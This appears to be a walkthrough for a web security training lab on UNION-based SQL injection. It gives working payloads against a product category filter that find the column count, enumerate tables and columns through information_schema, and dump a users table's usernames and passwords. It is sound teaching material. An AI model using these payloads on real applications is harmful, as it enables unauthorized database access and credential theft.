Difficulty : Practitioner
🎯 Goal
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response so you can use a UNION attack to retrieve data from other tables.
The application has a login function, and the database contains a table that holds usernames and passwords. You need to determine the name of this table and the columns it contains, then retrieve the contents of the table to obtain the username and password of all users.
To solve the lab, log in as the administrator user.
✅ Solution
Find the number of columns:
1
2
3
<website>/filter?category=Gifts'UNION SELECT NULL-- # error!
<website>/filter?category=Gifts'UNION SELECT NULL,NULL-- # works
<website>/filter?category=Gifts'UNION SELECT NULL,NULL,NULL-- # error!
We know 2 columns are returned by the query. Is one containing string?
1
2
<website>/filter?category=Gifts'UNION SELECT 'abc',NULL-- # works
<website>/filter?category=Gifts'UNION SELECT 'abc','abc'-- # works
We don’t know the name of the table storing the credentials. We have to list all the tables:
1
<website>/filter?category=Gifts'UNION SELECT table_name,NULL FROM information_schema.columns--
179 tables are returned… But after sorting those containing user one stands out: users_ijvpsp.
Let’s print the differents columns of the table:
1
<website>/filter?category=Gifts' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users_ijvpsp'--
We obtain 2 columns: username_gifugn and password_zjiaqz.
Time to show the passwords!
1
/filter?category=Pets' UNION SELECT username_gifugn, password_zjiaqz FROM users_ijvpsp--
Password obtained!